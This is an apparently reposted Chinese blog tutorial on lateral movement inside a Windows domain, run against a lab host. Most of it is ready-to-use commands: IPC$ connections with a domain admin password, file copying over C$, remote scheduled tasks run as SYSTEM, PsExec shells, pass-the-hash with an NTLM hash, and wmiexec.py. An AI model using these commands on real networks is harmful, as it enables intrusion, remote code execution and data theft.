您好,登錄后才能下訂單哦!
這篇文章主要講解了“如何使用內網中橫向移動的命令行工具”,文中的講解內容簡單清晰,易于學習與理解,下面請大家跟著小編的思路慢慢深入,一起來研究和學習“如何使用內網中橫向移動的命令行工具”吧!
目標機器: 192.168.101.157
一、IPC$連接
IPC$(Internet Process Connection) 是共享 " 命名管道 " 的資源,它是為了讓進程間通信而開放的命名管道,通過提供可信任的用戶名和口令,連接雙方可以建立安全的通道并以此通道進行加密數據的交換,從而實現對遠程計算機的訪問。
調出命令行窗口,可以先執行net use查看已建立的連接
執行以下命令與目標建立ipc$連接
net use \\192.168.101.157(目標ip) /u:god(域名)\Administrator(用戶名) hongrisec@2020(密碼)
執行成功會返回命令成功完成
之后可以使用dir命令列出目標文件夾文件,如執行以下命令列出c盤下文件夾
dir \\192.168.101.157\c$
列出c盤下phpStudy目錄的文件
dir \\192.168.101.157\c$\phpStudy
如果想下載文件則執行以下命令,將phpshao.dll文件下載存放至temp文件夾處
copy \\192.168.101.157\c$\phpStudy\phpshao.dll C:\Windows\temp
同理,如果想要上傳文件的話則執行
copy F:\test.txt \\192.168.101.157\c$
可以看到已經將文件傳輸上去了
也可以通過計劃任務執行系統命令,首先執行下面命令創建一個名為test2的計劃任務
schtasks /create /s 192.168.101.157 /tn test2 /sc minute /mo 1 /tr "C:\Windows\System32\cmd.exe /c 'whoami > C:\Windows\temp\test2.txt'" /ru system /f /u god\Administrator /p hongrisec@2020
之后執行以下命令,立即執行計劃任務
schtasks /run /s 192.168.101.157 /i /tn test2 /u god\Administrator /p hongrisec@2020
執行成功之后使用type命令查看執行內容的回顯
type \\192.168.101.157\c$\Windows\temp\test2.txt
二、psexec
也可以通過psexec去連接目標,不過動靜有點大,會在目標機器上起一個服務,產生大量日志
可以在這里下載
執行以下命令獲取一個交互式的shell,如果無法建立連接,嘗試使用管理員身份執行
PsExec64.exe -accepteula \\192.168.101.157(目標IP) -u god(域)\Administrator(用戶名) -p hongrisec@2020(密碼) -s cmd.exe
也可以執行以下命令,使用hash進行連接
psexec.exe -hashes AAD3B435B51404EEAAD3B435B51404EE:A812E6C2DEFCB0A7B80868F9F3C88D09 god/Administrator@192.168.1.1 "whoami"
當然msf里面也有模塊可以通過psexec與目標連接
exploit/windows/smb/psexec
三、wmiexec.py連接
可以在這里下載工具包
直接執行以下命令就可以建立連接了
python wmiexec.py god(域)/administrator(用戶名):hongrisec@2020(密碼)@192.168.101.157(目標IP)
也可以使用hash去連接目標,稍微變一下就可以了
感謝各位的閱讀,以上就是“如何使用內網中橫向移動的命令行工具”的內容了,經過本文的學習后,相信大家對如何使用內網中橫向移動的命令行工具這一問題有了更深刻的體會,具體使用情況還需要大家實踐驗證。這里是億速云,小編將為大家推送更多相關知識點的文章,歡迎關注!
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。